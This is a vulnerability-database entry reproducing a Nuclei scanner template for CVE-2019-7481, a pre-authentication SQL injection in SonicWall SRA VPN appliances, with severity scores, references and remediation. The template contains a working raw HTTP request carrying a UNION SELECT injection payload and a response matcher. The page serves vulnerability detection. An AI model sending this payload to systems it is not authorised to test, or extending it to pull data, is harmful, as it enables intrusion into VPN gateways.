Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-7481
HistoryJun 19, 2021 - 8:17 p.m.

SonicWall SRA 4600 VPN - SQL Injection

2021-06-1920:17:40
ProjectDiscovery
github.com
7

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.922 High

EPSS

Percentile

98.9%

The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.

id: CVE-2019-7481

info:
  name: SonicWall SRA 4600 VPN - SQL Injection
  author: _darrenmartyn
  severity: high
  description: The SonicWall SRA 4600 VPN appliance is susceptible to a pre-authentication SQL injection vulnerability.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.
  remediation: |
    Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7481
    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-7481
    cwe-id: CWE-89
    epss-score: 0.91724
    epss-percentile: 0.98849
    cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sonicwall
    product: sma_100_firmware
  tags: cve,cve2019,sonicwall,sqli,kev

http:
  - raw:
      - |
        POST /cgi-bin/supportInstaller HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: identity
        User-Agent: MSIE
        Content-Type: application/x-www-form-urlencoded

        fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--

    matchers:
      - type: word
        part: body
        words:
          - "4220397236"
# digest: 4a0a00473045022100fc2de1d32acd1cf03b96cd749569d4dc4cdee7056c2311673a98e7630f4d4d3402203efa55798fc436cf614875c6d85da4cfc4c103e7eecc44f05bf011b81f9e72f0:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.922 High

EPSS

Percentile

98.9%